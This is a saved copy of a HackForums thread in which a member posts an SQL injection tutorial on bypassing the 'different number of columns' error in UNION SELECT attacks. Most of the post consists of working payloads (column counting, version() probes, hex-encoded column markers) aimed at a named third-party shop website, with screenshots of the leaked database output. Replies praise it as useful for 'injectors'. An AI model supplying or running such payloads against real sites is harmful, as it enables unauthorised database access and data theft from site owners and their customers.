<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3687706" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3687706" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3687706</a>. It is a snapshot of the page as it appeared on 19 Mar 2014 20:35:18 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3687706" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:ygVDpih58Y8J:www.hackforums.net/showthread.php%3Ftid%3D3687706&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[Tutorial] SQLi - The used SELECT statements have a different number of columns - Page 1</title> <meta name="description" content="SQL Injection Attacks-[Tutorial] SQLi - The used SELECT statements have a different number of columns"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3687706"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-19-2014, 01:35 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[Tutorial] SQLi - The used SELECT statements have a different number of columns</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3687706" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/rating.js"></script><div id="success_rating_3687706" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3687706"><li style="width: 0%" class="current_rating" id="current_rating_3687706">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3687706&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3687706&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3687706&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3687706&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3687706&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3687706" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3687706_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3687706" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3687706&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3687706");
// -->
</script><div><strong>[Tutorial] SQLi - The used SELECT statements have a different number of columns</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid34571475" id="pid34571475"></a><table class="tborder" style="border-top-width: 0; " id="post_34571475" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-12-2013, 05:37 PM <span id="edited_by_34571475"><span class="smalltext">(This post was last modified: 08-12-2013 05:49 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34571475#pid34571475">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,154<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34571475">This tutorial is partly related to <a href="http://www.hackforums.net/showthread.php?tid=3683301" target="_blank"><span style="text-decoration: underline;">challenge #60</span></a><br><br>While doing SQLi we quite often get error <span style="font-weight: bold;"><span style="color: #32CD32;">#1222</span></span> <span style="font-weight: bold;"><span style="color: #FF4500;">The used SELECT statements have a different number of columns</span></span> although we are sure we used the right columns count in our UNION SELECT command.<br><br>From SQL we know when using UNION SELECT command two conditions are required:<br><ol type="1"><li><span style="color: #FFD700;">the same number of columns exists in all statements that make up the UNION'd query</span></li> <li><span style="color: #FFD700;">the column data type has to match at each column position</span><br></li></ol><br>So what can we do when we don't meet those conditions and get error <span style="color: #FF4500;">The used SELECT statements have a different number of columns</span>? In 95% cases (don't take that number to serious - it is my prediction) <span style="color: #FFD700;">that error means we should skip to error based SQL injection because we can't inject using UNION SELECT based SQLi.</span>
 But sometimes (rarely) we can still inject using UNION SELECT and get 
at least some data back from our injection (sometimes more, sometimes 
less).<br><br>Let's see example from <a href="http://www.hackforums.net/showthread.php?tid=3683301" target="_blank"><span style="text-decoration: underline;">challenge #60</span></a>. Normally we start with test for SQLi injection adding <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #32CD32;">'</span></span></span> after id parameter<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/096cbb5a75af7eb6f91664493bb22bcf.jpg" alt="[Image: 096cbb5a75af7eb6f91664493bb22bcf.jpg]" border="0"><br><br>and
 we get an error - so we know site is SQLi vulnerable. Next step is to 
find out number of columns, because we will need that info for our UNION
 SELECT command. We can use my tip from tutorial <a href="http://www.hackforums.net/showthread.php?tid=2698410" target="_blank"><span style="text-decoration: underline;">SQLi tip for newbies - finding number of columns</span></a> and copy/paste:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>group by<br>1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
​
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
​
7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,
​
84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,
​
108,109,110,111,112,113,114,115,116,117,118,119,120,200,300,400,500,1000%23</code></div></div><br>from our notes. We get our result:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/154170d0a9fcc2224f4e3a90fd247060.jpg" alt="[Image: 154170d0a9fcc2224f4e3a90fd247060.jpg]" border="0"><br><br><span style="color: #32CD32;">--&gt; there are 8 columns.</span><br><br>If you accepted my advice from my tutorial <a href="http://www.hackforums.net/showthread.php?tid=2853082" target="_blank"><span style="text-decoration: underline;">SQLi tip for newbies - learn from error message</span></a> then you already did analyze error response and you noticed in error response part in red rectangle:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/a575de44902aeda08956556aeac89eea.jpg" alt="[Image: a575de44902aeda08956556aeac89eea.jpg]" border="0"><br><br>In such case we can use <span style="font-size: medium;"><span style="color: #FFD700;">benzi's</span></span> <a href="http://www.hackforums.net/showthread.php?tid=2125898" target="_blank"><span style="text-decoration: underline;">[SQLI TRICK] find column count in one request [TUT]</span></a> and find columns count with: <span style="color: #FFD700;">and (select * from </span><span style="color: #32CD32;">put_here_table_name_from_error_response</span><span style="color: #FFD700;">)=1</span> like:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/93ff9154e9dc681415fd3df436174cd7.jpg" alt="[Image: 93ff9154e9dc681415fd3df436174cd7.jpg]" border="0"><br><br><span style="color: #32CD32;">Again we can see there are 8 columns</span> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>OK, let's compose our UNION SELECT command with 8 columns:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/59fad6f3bb620e51cb9d199061ca14be.jpg" alt="[Image: 59fad6f3bb620e51cb9d199061ca14be.jpg]" border="0"><br><br>but we get error <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/bebe-pleure.gif" style="vertical-align: middle;" alt="Bebe-pleure" title="Bebe-pleure" border="0"><br><br>As I already said normally we should change our injection type and use <span style="font-weight: bold;"><span style="color: #FFD700;">error based</span></span> injection:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/7b231e6929028fe1fbfbe50ef83ac79a.jpg" alt="[Image: 7b231e6929028fe1fbfbe50ef83ac79a.jpg]" border="0"><br><br><span style="font-size: x-large;"><span style="color: #00BFFF;"><span style="font-weight: bold;">What I do usually if I still want to try with UNION SELECT based SQLi?</span></span></span><br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #32CD32;">#1</span></span></span><br>First I put version() at all columns places:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marabous.com.au/product.php?id=4
 and 0 union select version(), version(), version(), version(), 
version(), version(), version(), version()-- -</code></div></div><br>If I get any indication of version data in error response like:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/8624172dc7c90b552346ed87088c4966.jpg" alt="[Image: 8624172dc7c90b552346ed87088c4966.jpg]" border="0"><br>then chances to use UNION SELECT based SQLi are good...<br><br>We still don't know which column is vulnerable. We can find that out with putting version() instead of <span style="color: #00BFFF;">only one column in a time</span> and leave on all other places column numbers (<span style="color: #32CD32;">or null</span>) like:<br><br><span style="color: #00BFFF;">version()</span> instead of <span style="color: #FFD700;">first column</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marabous.com.au/product.php?id=4 and 0 union select version(),2,3,4,5,6,7,8-- -</code></div></div><span style="color: #FF4500;">--&gt; no luck</span><br><br>next try - <span style="color: #32CD32;">version()</span> instead of <span style="color: #FFD700;">second column</span>:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marabous.com.au/product.php?id=4 and 0 union select 1,version(),3,4,5,6,7,8-- -</code></div></div><span style="color: #32CD32;">--&gt; aha, we get version - so column #2 is vulnerable</span><br><br>When above procedure doesn't work try also with <span style="color: #FFD700;">null </span>instead of column numbers like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marabous.com.au/product.php?id=4 and 0 union select null, version(), null, null, null, null, null, null-- -</code></div></div><br>That procedure can be time consuming when there are many columns (btw my columns count record is <span style="font-weight: bold;"><span style="color: #FFD700;">569</span></span>)<br><br>That is why I prefer another way of testing...<br><br><span style="font-weight: bold;"><span style="font-size: x-large;"><span style="color: #32CD32;">#2</span></span></span><br>Instead of version() we will put colon (<span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #32CD32;">:</span></span></span>) with column's number like<br><span style="color: #FFD700;">union select :1, :2, :3, :4, :5, :6, :7, :8</span> but with converted values to hex:<br><br><span style="color: #FFD700;">:1</span> --&gt; <span style="color: #32CD32;">0x3a31</span><br><span style="color: #FFD700;">:2</span> --&gt; <span style="color: #32CD32;">0x3a32</span><br><span style="color: #FFD700;">:3</span> --&gt; <span style="color: #32CD32;">0x3a33</span><br>...<br><br>So our command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.marabous.com.au/product.php?id=4
 and 0 union select 0x3a31, 0x3a32, 0x3a33, 0x3a34, 0x3a35, 0x3a36, 
0x3a37, 0x3a38-- -</code></div></div><br><span style="font-size: medium;"><span style="color: #FFA500;"><span style="font-weight: bold;">What is benefit of using it?</span></span></span> From error response we can already see vulnerable column:<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/4ec8311d83b1dd9eb0cf6e1040ff21ed.jpg" alt="[Image: 4ec8311d83b1dd9eb0cf6e1040ff21ed.jpg]" border="0"><br><br>Site in <a href="http://www.hackforums.net/showthread.php?tid=3683301" target="_blank"><span style="text-decoration: underline;">challenge #60</span></a> is "generous" and gives us full version in error response.<br><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/8898f87583328620558142d964a2adb1.jpg" alt="[Image: 8898f87583328620558142d964a2adb1.jpg]" border="0"><br><br>It is not always like that <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/non.gif" style="vertical-align: middle;" alt="Non" title="Non" border="0"> Usually we have to play with <span style="color: #32CD32;">concat()</span> function to get some result (concatenating different characters to <span style="color: #00BFFF;">version()</span>, <span style="color: #00BFFF;">database()</span>, <span style="color: #00BFFF;">table_name</span>... to see them properly). There is no other recipe as playing with different combinations to get best result.<br><br>Although we used UNION SELECT injection result of injection <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">is not</span></span></span> classic UNION SELECT result but is <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFA500;">part of error response</span></span></span>.
 That is why we can't always display all those things we can using 
classic UNION SELECT injection. But if you see proof picture from <a href="http://www.hackforums.net/showthread.php?tid=3683301" target="_blank"><span style="text-decoration: underline;">challenge #60</span></a> with such injection as described above we can some times display quite a lot of data (click on spoiler)...<br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/a5907a0a81b00629559e2e256f087426.jpg" alt="[Image: a5907a0a81b00629559e2e256f087426.jpg]" border="0"></div></div><br>Thanks for reading <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_34571475"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34571475" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34576550" id="pid34576550"></a><table class="tborder" style="margin-top: 5px; " id="post_34576550" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-12-2013, 07:57 PM <span id="edited_by_34576550"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34576550#pid34576550">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 165<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34576550">Nice trick my friend!<br>long time I have not done sqli.</div><div class="post_meta" id="post_meta_34576550"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3687706&amp;replyto=34576550" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid34578917" id="pid34578917"></a><table class="tborder" style="margin-top: 5px; " id="post_34578917" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">08-12-2013, 10:29 PM <span id="edited_by_34578917"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3687706&amp;pid=34578917#pid34578917">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=72496"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/1667c96fb90d94769e72069d6cad71b6.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=72496"><span class="group29">133720</span></a></span></strong> <img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">&lt;?= Security != Coding ?&gt;<br><span class="userstars"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 132<br>Posts: 2,304<br>Joined: Jun 2009<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=72496"><strong class="reputation_positive">401</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20SQLi%20-%20The%20used%20SELECT%20statements%20have%20a%20different%20number%20of%20columns%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_34578917">Very Nice Write Up!<br>it really help injector.<br>Thanks ajkaro.</div><div class="post_meta" id="post_meta_34578917"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.cyberoot.com/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=72496" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div 